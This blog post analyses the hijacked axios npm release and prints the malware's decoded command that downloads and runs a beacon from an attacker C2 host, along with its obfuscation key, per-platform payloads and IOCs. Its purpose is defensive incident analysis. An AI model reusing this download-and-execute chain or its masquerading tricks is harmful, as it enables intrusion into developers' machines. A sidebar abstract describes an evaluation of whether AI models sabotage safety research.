Welcome to Transitive Dependency Hell
<p>At 00:21 UTC on March 31, someone published <code>[email protected]</code> to npm. Three hours later it was pulled. In between, every <code>npm install</code> and <code>npx</code> invocation that resolved <code>axios@latest</code> executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.</p> <h2> Monday Night </h2> <p>A developer sits down, opens a terminal, and runs a command they've run dozens of times before:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npx <span class="nt">--yes</span> @datadog/datadog-ci <span class="nt">--help</span> </code></pre> </div> <p>A legitimate tool from a legitimate vendor. The <code>--yes</code> flag sk
At 00:21 UTC on March 31, someone published [email protected] to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here's what that three-hour window looked like from one developer's MacBook.
Monday Night
A developer sits down, opens a terminal, and runs a command they've run dozens of times before:
npx --yes @datadog/datadog-ci --help
Enter fullscreen mode
Exit fullscreen mode
A legitimate tool from a legitimate vendor. The --yes flag skips npm's confirmation prompt. The developer (or Claude) isn't even using the tool yet, just checking its options.
npm resolves the dependency tree and starts writing packages to disk: dogapi, escodegen, esprima, js-yaml, fast-xml-parser, rc, is-docker, semver, uuid, and axios. All names you'd recognize, and all packages that individually look fine. But axios just resolved to 1.14.1, which is not the version that Axios's maintainers published four days earlier. It's the version an attacker published twenty minutes ago.
The Hijack
[email protected] was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of jasonsaayman, an existing Axios maintainer, and changed the account email from [email protected] to [email protected]. With publish access, they pushed two malicious versions in quick succession:
-
00:21:58 UTC: [email protected], tagged latest
-
01:00:57 UTC: [email protected], tagged legacy
The latest tag meant every unversioned axios install worldwide pulled the backdoor. The legacy tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: plain-crypto-js.
The Postinstall Chain
plain-crypto-js declared postinstall: node setup.js in its package.json, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with OrDeR_7077) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.
On the developer's Mac, CrowdStrike's process tree captured the full chain. npx spawned node setup.js, which shelled out to /bin/sh to launch osascript against a script dropped into the per-user temp directory:
nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
Enter fullscreen mode
Exit fullscreen mode
osascript is Apple's AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The nohup ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:
sh -c 'curl -o /Library/Caches/com.apple.act.mond \ -d packages.npm.org/product0 \ -s http://sfrclak.com:8000/6202033 \ && chmod 770 /Library/Caches/com.apple.act.mond \ && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \ &> /dev/nullsh -c 'curl -o /Library/Caches/com.apple.act.mond \ -d packages.npm.org/product0 \ -s http://sfrclak.com:8000/6202033 \ && chmod 770 /Library/Caches/com.apple.act.mond \ && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \ &> /dev/nullEnter fullscreen mode
Exit fullscreen mode
Download, set executable, and launch the beacon, all in a single sh -c invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.
The output path masquerades as an Apple system daemon using the com.apple.* reverse-DNS convention. The -d packages.npm.org/product0 is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The -s flag keeps curl silent, and the outer &> /dev/null swallows any output from the entire chain.*
The binary immediately began beaconing to 142.11.206.73:8000 (sfrclak.com) over HTTP. Ten hours later, CrowdStrike's telemetry shows com.apple.act.mond still running and reading /Library/Preferences/com.apple.networkd.plist for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you're deciding whether a machine is worth keeping access to.
Meanwhile, back in node_modules, setup.js was cleaning up after itself. It deleted its own file with fs.unlink(filename) and renamed a clean package.md to package.json, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.
Not Just Macs
The same setup.js had branches for every major platform:
Platform Payload Path Technique
macOS
/Library/Caches/com.apple.act.mond
AppleScript, curl, binary masquerading as Apple daemon
Windows
%PROGRAMDATA%\wt.exe
PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops .ps1 payload with -w hidden -ep bypass
Linux
/tmp/ld.py
Python script downloaded and backgrounded with nohup python3
All three phoned home to the same C2: sfrclak.com:8000/6202033.
What CrowdStrike Caught (and Didn't)
Falcon flagged the macOS beacon as MacOSApplicationLayerProtocol, mapping to T1071 (Application Layer Protocol) under TA0011 (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.
Everything before that ran unimpeded. The node setup.js postinstall hook, the osascript execution from a temp directory, the curl download and chmod all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.
IOCs
Indicator Type Value
C2 Domain
Domain
sfrclak.com
C2 IP
IPv4
142.11.206.73
C2 Port
Port
8000
Campaign ID
String
6202033
macOS Payload
File
/Library/Caches/com.apple.act.mond
macOS Hash
SHA256
92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a
Windows Payload
File
%PROGRAMDATA%\wt.exe
Linux Payload
File
/tmp/ld.py
Tracking ID
String
packages.npm.org/product0
Compromised Packages npm
[email protected], [email protected], [email protected]
Hijacked Account npm
jasonsaayman (email changed to [email protected])
XOR Key
String
OrDeR_7077
Takeaways
Check your lockfiles now. Search package-lock.json, yarn.lock, and pnpm-lock.yaml for [email protected], [email protected], or any reference to plain-crypto-js. If you find them, assume the installing machine is compromised.
Disable postinstall scripts. Add ignore-scripts=true to ~/.npmrc. When a package legitimately needs a postinstall hook for native compilation, run npm rebuild explicitly after reviewing the script. This single setting would have stopped the entire attack chain.
Monitor for osascript spawned by node. There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.
The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm's default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every npm install into an implicit trust decision across hundreds of packages maintained by people you've never met. The Axios maintainer account was compromised for three hours. That was enough.
This is the third post in a series on software supply chain attacks. The previous posts covered the Trivy ecosystem compromise and the limits of SHA pinning. Joe Desimone's technical analysis of the axios compromise is worth reading in full.
If you liked (or hated) this blog, feel free to check out my GitHub!
Sign in to highlight and annotate this article

Conversation starters
Daily AI Digest
Get the top 5 AI stories delivered to your inbox every morning.
More about
claudereleaselaunchUK AISI Alignment Evaluation Case-Study
arXiv:2604.00788v1 Announce Type: new Abstract: This technical report presents methods developed by the UK AI Security Institute for assessing whether advanced AI systems reliably follow intended goals. Specifically, we evaluate whether frontier models sabotage safety research when deployed as coding assistants within an AI lab. Applying our methods to four frontier models, we find no confirmed instances of research sabotage. However, we observe that Claude Opus 4.5 Preview (a pre-release snapshot of Opus 4.5) and Sonnet 4.5 frequently refuse to engage with safety-relevant research tasks, citing concerns about research direction, involvement in self-training, and research scope. We additionally find that Opus 4.5 Preview shows reduced unprompted evaluation awareness compared to Sonnet 4.5,
Ontology-Constrained Neural Reasoning in Enterprise Agentic Systems: A Neurosymbolic Architecture for Domain-Grounded AI Agents
arXiv:2604.00555v1 Announce Type: new Abstract: Enterprise adoption of Large Language Models (LLMs) is constrained by hallucination, domain drift, and the inability to enforce regulatory compliance at the reasoning level. We present a neurosymbolic architecture implemented within the Foundation AgenticOS (FAOS) platform that addresses these limitations through ontology-constrained neural reasoning. Our approach introduces a three-layer ontological framework--Role, Domain, and Interaction ontologies--that provides formal semantic grounding for LLM-based enterprise agents. We formalize the concept of asymmetric neurosymbolic coupling, wherein symbolic ontological knowledge constrains agent inputs (context assembly, tool discovery, governance thresholds) while proposing mechanisms for extendi
Dubai launches AI-powered digital ecosystem to drive $2.72bn growth in two years - Arabian Business
<a href="https://news.google.com/rss/articles/CBMiugFBVV95cUxPbXJLRFR2anI4cDJWNG10WnJXZGY1U0lHVHA0YzJBU1lvRndBU2NiX3VQeC16Tl9tSnhVTWZGRjRGdUZFLW43bU1TeV9nUXZERHRYOW1FMGg4UndjZXQ5RnZHS1p2QVpjenFnSGlLTExUTG15N1BmN1h2cXRBcW9YdWRWZ3ZnWmFMNHF3UEFZNTJmNFpVeTB0VXgzSXUzVnFCUTM2LUZUbXNUamFoREhIWDY4b2h4VllQMkE?oc=5" target="_blank">Dubai launches AI-powered digital ecosystem to drive $2.72bn growth in two years</a> <font color="#6f6f6f">Arabian Business</font>
Knowledge Map
Connected Articles — Knowledge Graph
This article is connected to other articles through shared AI topics and tags.
More in Products
Agent psychometrics: Task-level performance prediction in agentic coding benchmarks
arXiv:2604.00594v1 Announce Type: new Abstract: As the focus in LLM-based coding shifts from static single-step code generation to multi-step agentic interaction with tools and environments, understanding which tasks will challenge agents and why becomes increasingly difficult. This is compounded by current practice: agent performance is typically measured by aggregate pass rates on benchmarks, but single-number metrics obscure the diversity of tasks within a benchmark. We present a framework for predicting success or failure on individual tasks tailored to the agentic coding regime. Our approach augments Item Response Theory (IRT) with rich features extracted from tasks, including issue statements, repository contexts, solutions, and test cases, and introduces a novel decomposition of age
Phonological Fossils: Machine Learning Detection of Non-Mainstream Vocabulary in Sulawesi Basic Lexicon
arXiv:2604.00023v1 Announce Type: new Abstract: Basic vocabulary in many Sulawesi Austronesian languages includes forms resisting reconstruction to any proto-form with phonological patterns inconsistent with inherited roots, but whether this non-conforming vocabulary represents pre-Austronesian substrate or independent innovation has not been tested computationally. We combine rule-based cognate subtraction with a machine learning classifier trained on phonological features. Using 1,357 forms from six Sulawesi languages in the Austronesian Basic Vocabulary Database, we identify 438 candidate substrate forms (26.5%) through cognate subtraction and Proto-Austronesian cross-checking. An XGBoost classifier trained on 26 phonological features distinguishes inherited from non-mainstream forms wi
mmAnomaly: Leveraging Visual Context for Robust Anomaly Detection in the Non-Visual World with mmWave Radar
arXiv:2604.00382v1 Announce Type: new Abstract: mmWave radar enables human sensing in non-visual scenarios-e.g., through clothing or certain types of walls-where traditional cameras fail due to occlusion or privacy limitations. However, robust anomaly detection with mmWave remains challenging, as signal reflections are influenced by material properties, clutter, and multipath interference, producing complex, non-Gaussian distortions. Existing methods lack contextual awareness and misclassify benign signal variations as anomalies. We present mmAnomaly, a multi-modal anomaly detection framework that combines mmWave radar with RGBD input to incorporate visual context. Our system extracts semantic cues-such as scene geometry and material properties-using a fast ResNet-based classifier, and use
CodeCureAgent: Automatic Classification and Repair of Static Analysis Warnings
arXiv:2509.11787v4 Announce Type: replace-cross Abstract: Static analysis tools are widely used to detect bugs, vulnerabilities, and code smells. Traditionally, developers must resolve these warnings manually. Because this process is tedious, developers sometimes ignore warnings, leading to an accumulation of warnings and a degradation of code quality. This paper presents CodeCureAgent, an approach that harnesses LLM-based agents to automatically analyze, classify, and repair static analysis warnings. Unlike previous work, our method does not follow a predetermined algorithm. Instead, we adopt an agentic framework that iteratively invokes tools to gather additional information from the codebase (e.g., via code search) and edit the codebase to resolve the warning. CodeCureAgent detects and

Discussion
Sign in to join the discussion
No comments yet — be the first to share your thoughts!